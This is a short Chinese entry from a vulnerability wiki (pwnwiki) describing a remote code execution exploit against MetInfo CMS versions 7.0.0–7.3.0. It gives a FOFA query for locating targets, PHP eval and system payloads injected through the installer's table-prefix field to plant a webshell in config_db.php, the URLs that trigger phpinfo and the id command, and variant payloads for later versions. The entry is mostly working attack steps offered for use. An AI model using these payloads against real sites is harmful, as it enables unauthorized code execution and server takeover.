免费、自由、人人可编辑的漏洞库--pwnwiki.com
,
FOFA
body="MetInfo"
影响版本
7.3.0- 7.0.0
漏洞利用
在安装该CMS - 【设置数据库信息(数据表前缀)】:
代码执行Payload:
"/@eval($_GET'1');/
命令执行payload:
"/@system($_GET'1');/
点击保存进行下一步验证,出现报错信息
(这里的Payload是代码执行)
访问以下url:
http://<target>/config/config_db.php?1=phpinfo();
可以看到成功执行了phpinfo
(这里的Payload是命令执行)
访问以下URL:
http://<target>/config/config_db.php?1=id();
成功执行id命令。
其他
Version 7.10 Payload:"/@eval($_GET'1');@system($_GET'2');/
Version 7.20 Payload: "/@eval($_GET'1');@system($_GET'2');/
PWNWIK.COM==免费、自由、人人可编辑的漏洞库